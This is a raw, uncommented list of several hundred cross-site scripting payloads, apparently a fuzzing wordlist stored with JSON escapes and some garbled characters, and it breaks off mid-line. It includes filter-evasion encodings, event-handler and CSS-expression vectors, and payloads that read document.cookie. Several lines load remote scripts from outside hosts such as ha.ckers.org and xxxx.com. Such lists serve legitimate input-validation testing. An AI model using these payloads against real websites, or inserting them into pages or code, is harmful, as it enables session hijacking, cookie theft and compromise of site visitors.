javascript\u0026#058;alert('XSS');\\\"\u0026gt;\nperl -e 'print \\\"\u0026lt;SCR\\0IPT\u0026gt;alert(\\\\\"XSS\\\\\")\u0026lt;/SCR\\0IPT\u0026gt;\\\";' \u0026gt; out\nperl -e 'print \\\"\u0026lt;IMG SRC=java\\0script\u0026#058;alert(\\\\\"XSS\\\\\")\u0026gt;\\\";' \u0026gt; out\n\u0026lt;IMG SRC=\\\"jav\u0026#x0D;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"jav\u0026#x0A;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"jav\u0026#x09;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u0026gt;\n\u0026lt;IMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert('XSS')\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert(String\u0026#46;fromCharCode(88,83,83))\u0026gt;\n\u0026lt;IMG \\\"\\\"\\\"\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;IMG SRC=`javascript\u0026#058;alert(\\\"RSnake says, 'XSS'\\\")`\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert(\u0026quot;XSS\u0026quot;)\u0026gt;\n\u0026lt;IMG SRC=JaVaScRiPt\u0026#058;alert('XSS')\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert('XSS')\u0026gt;\n\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;SCRIPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n'';!--\\\"\u0026lt;XSS\u0026gt;=\u0026{()}\n';alert(String\u0026#46;fromCharCode(88,83,83))//\\';alert(String\u0026#46;fromCharCode(88,83,83))//\\\";alert(String\u0026#46;fromCharCode(88,83,83))//\\\\\";alert(String\u0026#46;fromCharCode(88,83,83))//--\u0026gt;\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String\u0026#46;fromCharCode(88,83,83))\u0026lt;/SCRIPT\u0026gt;\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n'';!--\"\u003cXSS\u003e=\u0026{()}\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js\u003e\u003c/SCRIPT\u003e\n\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=javascript:alert('XSS')\u003e\n\u003cIMG SRC=javascrscriptipt:alert('XSS')\u003e\n\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG SRC=\" \u0026#14;  javascript:alert('XSS');\"\u003e\n\u003cSCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT/SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003ea=/XSS/alert(a.source)\u003c/SCRIPT\u003e\n\\\";alert('XSS');//\n\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n�script�alert(�XSS�)�/script�\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\n\u003cTABLE BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\u003e\n\u003cDIV STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\n\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");xss:\u0026#101;x\u0026#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'\u003e\n\u003cEMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\na=\"get\";b=\"URL(ja\\\"\";c=\"vascr\";d=\"ipt:ale\";e=\"rt('XSS');\\\")\";eval(a+b+c+d+e);\n\u003cSCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"\u003e\u003c/SCRIPT\u003e\n\u003cHTML\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\"\u003e\u003c/BODY\u003e\u003c/HTML\u003e\n\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cform id=\"test\" /\u003e\u003cbutton form=\"test\" formaction=\"javascript:alert(123)\"\u003eTESTHTML5FORMACTION\n\u003cform\u003e\u003cbutton formaction=\"javascript:alert(123)\"\u003ecrosssitespt\n\u003cframeset onload=alert(123)\u003e\n\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\n\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\n\u003cobject data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\n\u003cembed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\n\u003cembed src=\"javascript:alert(1)\"\u003e\n\u003c? foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c! foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c/ foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003cscript\u003e({0:#0=alert/#0#/#0#(123)})\u003c/script\u003e\n\u003cscript\u003eReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x\u003c/script\u003e\n\u003cscript\u003eObject.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()\u003c/script\u003e\n\u003cscript src=\"#\"\u003e{alert(1)}\u003c/script\u003e;1\n\u003cscript\u003ecrypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')\u003c/script\u003e\n\u003csvg xmlns=\"#\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\n\u003csvg onload=\"javascript:alert(123)\" xmlns=\"#\"\u003e\u003c/svg\u003e\n\u003ciframe xmlns=\"#\" src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\n%253cscript%253ealert(document.cookie)%253c/script%253e\n�\u003e\u003cs�%2b�cript\u003ealert(document.cookie)\u003c/script\u003e\n�\u003e\u003cScRiPt\u003ealert(document.cookie)\u003c/script\u003e\n�\u003e\u003c\u003cscript\u003ealert(document.cookie);//\u003c\u003c/script\u003e\nfoo\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert(document.cookie)\u003c/scr\u003c/script\u003eipt\u003e\n%22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E\n�; alert(document.cookie); var foo=�\nfoo\\�; alert(document.cookie);//�;\n\u003c/script\u003e\u003cscript \u003ealert(document.cookie)\u003c/script\u003e\n\u003cimg src=asdf onerror=alert(document.cookie)\u003e\n\u003cBODY ONLOAD=alert(�XSS�)\u003e\n\u003cscript\u003ealert(1)\u003c/script\u003e\n\"\u003e\u003cscript\u003ealert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))\u003c/script\u003e\n\u003cvideo src=1 onerror=alert(1)\u003e\n\u003caudio src=1 onerror=alert(1)\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n\u003e\u003cimg id=XSS SRC=x onerror=alert(XSS);\u003e\n;!--\"\u003cXSS\u003e=\u0026{()}\"\n\u003cIMG id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=javascript:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=javascript:alert(\"XSS\")\u003e\n\u003cIMG id=XSS SRC=`javascript:alert(\"'XSS'\")`\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG id=XSS SRC=\"jav ascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"jav    ascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"jav\nascript:alert('XSS');\"\u003e\nperl -e 'print \"\u003cIMG id=XSS SRC=java\\0script:alert(\\\"XSS\\\")\u003e\";' \u003e out\n\u003cIMG id=XSS SRC=\"  javascript:alert('XSS');\"\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\\\";alert('XSS');//\n\u003cIMG id=XSS SRC='javascript:alert('XSS')\n\u003cSCRIPT\u003ealert(/XSS/.source)\u003c/SCRIPT\u003e\n\u003cBODY BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\u003cINPUT TYPE=\"IMAGE\" id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBODY ONLOAD=alert('XSS')\u003e\n\u003cIMG DYN id=XSS SRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOW id=XSS SRC=\"javascript:alert('XSS')\"\u003e\n\u003cBGSOUND id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC='vbscript:msgbox(\"XSS\")'\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cTABLE id=XSS BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cTABLE id=XSS\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV id=XSS STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV id=XSS STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cIFRAME id=XSS SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cFRAMESET\u003e\u003cFRAME id=XSS SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\n\u003cTABLE BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\"\n\u003cDIV id=XSS STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV id=XSS STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG id=XSS STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\n\u003cSTYLE TYPE=\"text/javascript\"\u003ealert('XSS');\u003c/STYLE\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e\n\u003cBASE HREF=\"javascript:alert('XSS');//\"\u003e\n\u003cOBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e\u003cparam name=url value=javascript:alert('XSS')\u003e\u003c/OBJECT\u003e\na=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(a+b+c+d);\n\u003cXML id=XSS\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG id=XSS SRC=\"javas]]\u003e\u003c![CDATA[cript:alert('XSS');\"\u003e]]\u003e\u003c/C\u003e\u003c/X\u003e\u003cxml\u003e\u003cSPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML\u003e\u003c/SPAN\u003e\n\u003cXML ID=\"XSS\"\u003e\u003cI\u003e\u003cB\u003e\u003cIMG id=XSS SRC=\"javas\u003c!-- --\u003ecript:alert('XSS')\"\u003e\u003c/B\u003e\u003c/I\u003e\u003c/XML\u003e\u003cSPAN DATAid=XSS SRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"\u003e\u003c/SPAN\u003e\n\u003cXML id=XSS SRC=\"xsstest.xml\" ID=I\u003e\u003c/XML\u003e\u003cSPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML\u003e\u003c/SPAN\u003e\n\u003cHTML\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u003cSCRIPT DEFER\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\u003c/BODY\u003e\u003c/HTML\u003e\n\u003c? echo('\u003cSCR)';echo('IPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e'); ?\u003e\n\u003cMETA HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=\u003cSCRIPT\u003ealert('XSS')\u003c/SCRIPT\u003e\"\u003e\n\u003cSCRIPT id=XSS SRC=http://127.0.0.1\u003e\u003c/SCRIPT\u003e\n//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cIMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG id=XSS SRC=\"\u002614;javascript:alert('XSS');\"\u003e\n\u003cSCRIPT \u003cB\u003e=alert('XSS');\"\u003e\u003c/SCRIPT\u003e\n\u003cIFRAME id=XSS SRC=\"javascript:alert('XSS'); \u003c\n\u003cSCRIPT\u003ea=/XSS/nalert('XSS');\u003c/SCRIPT\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:alert('XSS');\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'));\"\u003e\n\u003cHEAD\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e\u003c/HEAD\u003e+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\u003ca href=\"javascript#alert('XSS');\"\u003e\n\u003cdiv onmouseover=\"alert('XSS');\"\u003e,\n\u003cinput type=\"image\" dynid=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u0026\u003cscript\u003ealert('XSS');\u003c/script\u003e\"\u003e\n\u003cIMG id=XSS SRC=\u0026{alert('XSS');};\u003e\n\u003ca id=XSS href=\"about:\u003cscript\u003ealert('XSS');\u003c/script\u003e\"\u003e\n\u003cDIV id=XSS STYLE=\"binding: url(javascript:alert('XSS'));\"\u003e\n\u003cOBJECT classid=clsid:...\" codebase=\"javascript:alert('XSS');\"\u003e\n\u003cstyle\u003e\u003c!--\u003c/style\u003e\u003cscript\u003ealert('XSS');//--\u003e\u003c/script\u003e\n![CDATA[\u003c!--]]\u003cscript\u003ealert('XSS');//--\u003e\u003c/script\u003e\n\u003c!-- -- --\u003e\u003cscript\u003ealert('XSS');\u003c/script\u003e\u003c!-- -- --\u003e\n\u003cimg id=XSS SRC=\"blah\"onmouseover=\"alert('XSS');\"\u003e\n\u003cimg id=XSS SRC=\"blah\u003e\"onmouseover=\"alert('XSS');\"\u003e\n\u003cxml id=\"X\"\u003e\u003ca\u003e\u003cb\u003e\u003cscript\u003ealert('XSS');\u003c/script\u003e;\u003cb\u003e\u003c/a\u003e\u003c/xml\u003e\n\u003cdiv datafld=\"b\" dataformatas=\"html\" dataid=XSS SRC=\"#XSS\"\u003e\u003c/div\u003e\n[\\xC0][\\xBC]script\u003ealert('XSS');[\\xC0][\\xBC]/script\u003e\n\u003cXML ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG id=XSS SRC=\"javas]]\u003c![CDATA[cript:alert('XSS');\"\u003e]]\u003c/C\u003e\u003cX\u003e\u003c/xml\u003e\n\u003cform id=\"test\" /\u003e\u003cbutton form=\"test\" formaction=\"javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))\"\u003eX\n\u003cinput id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus\u003e\n\u003cselect id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus\u003e\n\u003ctextarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus\u003e\n\u003ckeygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus\u003e\n\u003cinput id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus\u003e\u003cinput autofocus\u003e\n\u003cvideo id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//\n\u003cbody id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\n\u003cvideo\u003e\u003csource onerror=\"javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))\"\u003e\n\u003cvideo onerror=\"javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))\"\u003e\u003csource\u003e\n\u003ciframe id=XSS / /onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\u003ciframe id=XSS / \"onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\u003ciframe id=XSS///////onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\u003ciframe id=XSS \"onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\u003ciframe id=XSS \u003c?php echo chr(11)?\u003e onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\u003ciframe id=XSS \u003c?php echo chr(12)?\u003e onload=alert(/XSS/)\u003e\u003c/iframe\u003e\n\" onfocus=alert(XSS) \"\u003e \u003c\"\n\" onblur=alert(XSS) \"\u003e \u003c\"\n\" onmouseover=alert(XSS) \"\u003e\n\" onclick=alert(XSS) \"\u003e\n\u003cFRAMESET\u003e\u003cFRAME id=XSS SRC=\\\"javascript:alert('XSS');\\\"\u003e\u003c/FRAMESET\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\\\"javascript:alert('XSS')\\\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\n\u003c/textarea\u003e'\"\u003e\u003cscript\u003ealert(XSS)\u003c/script\u003e\n'\"\"\u003e\u003cscript language=\"JavaScript\"\u003e alert('X \\nS \\nS');\u003c/script\u003e\n\u003c/script\u003e\u003c/script\u003e\u003c\u003c\u003c\u003cscript\u003e\u003c\u003e\u003e\u003e\u003e\u003c\u003c\u003cscript\u003ealert(XSS)\u003c/script\u003e\n\u003chtml\u003e\u003cnoalert\u003e\u003cnoscript\u003e(XSS)\u003c/noscript\u003e\u003cscript\u003e(XSS)\u003c/script\u003e\n\u003cINPUT TYPE=\"IMAGE\" id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n'\u003e\u003c/select\u003e\u003cscript\u003ealert(XSS)\u003c/script\u003e\n}\u003c/style\u003e\u003cscript\u003ea=eval;b=alert;a(b(/XSS/.source));\u003c/script\u003e\n\u003cSCRIPT\u003edocument.write(\"XSS\");\u003c/SCRIPT\u003e\na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('xss');\";eval(a+b+c+d);\n='\u003e\u003cscript\u003ealert(\"xss\")\u003c/script\u003e\n\u003cbody background=javascript:'\"\u003e\u003cscript\u003ealert(XSS)\u003c/script\u003e\u003e\u003c/body\u003e\ndata:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\n\u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n'';!--\"\u003cXSS\u003e=\u0026{()}\n\u003cSCRIPT id=XSS SRC=http://xxxx.com/xss.js\u003e\u003c/SCRIPT\u003e\n\u003cIMG id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=javascript:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=javascript:alert(\"XSS\")\u003e\n\u003cIMG id=XSS SRC=`javascript:alert(\"RSnake says, 'XSS'\")`\u003e\n\u003cIMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\nid=XSS SRC=\u003cIMG 6;avascript:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=javascript:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=javascript:alert('XSS')\u003e\n\u003cIMG id=XSS SRC=\"jav ascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"jav    ascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"jav\nascript:alert('XSS');\"\u003e\n\u003cIMG id=XSS SRC=\"  javascript:alert('XSS');\"\u003e\n\u003cSCRIPT/XSS id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT id=XSS SRC=http://xxxx.com/xss.js?\u003cB\u003e\n\u003cIMG id=XSS SRC=\"javascript:alert('XSS')\"\n\u003cSCRIPT\u003ea=/XSS/\n\\\";alert('XSS');//\n\u003cINPUT TYPE=\"IMAGE\" id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBODY BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cBODY ONLOAD=alert('XSS')\u003e\n\u003cIMG DYNid=XSS SRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOWid=XSS SRC=\"javascript:alert('XSS')\"\u003e\n\u003cBGSOUND id=XSS SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBR SIZE=\"\u0026{alert('XSS')}\"\u003e\n\u003cLAYER id=XSS SRC=\"http://xxxx.com/scriptlet.html\"\u003e\u003c/LAYER\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"http://xxxx.com/xss.css\"\u003e\n\u003cSTYLE\u003e@import'http://xxxx.com/xss.css';\u003c/STYLE\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003chttp://xxxx.com/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cSTYLE\u003eBODY{-moz-binding:url(\"http://xxxx.com/xssmoz.xml#xss\")}\u003c/STYLE\u003e\n\u003cIMG id=XSS SRC='vbscript:msgbox(\"XSS\")'\u003e\n\u003cIMG id=XSS SRC=\"mocha:[code]\"\u003e\n\u003cIMG id=XSS SRC=\"livescript:[code]\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003cjavascript:alert('XSS')\u003e; REL=stylesheet\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"\u003e\n\u003cIFRAME id=XSS SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cFRAMESET\u003e\u003cFRAME id=XSS SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\n\u003cTABLE BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\n\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\nexp/*\u003cXSS STYLE='no\\xss:noxss(\"*//*\");\n\u003cSTYLE TYPE=\"text/javascript\"\u003ealert('XSS');\u003c/STYLE\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e\n\u003cBASE HREF=\"javascript:alert('XSS');//\"\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xxxx.com/scriptlet.html\"\u003e\u003c/OBJECT\u003e\n\u003cOBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e\u003cparam name=url value=javascript:alert('XSS')\u003e\u003c/OBJECT\u003e\ngetURL(\"javascript:alert('XSS')\")\na=\"get\";\n\u003c!--\u003cvalue\u003e\u003c![CDATA[\u003cXML ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG id=XSS SRC=\"javas\u003c![CDATA[cript:alert('XSS');\"\u003e\n\u003cXML id=XSS 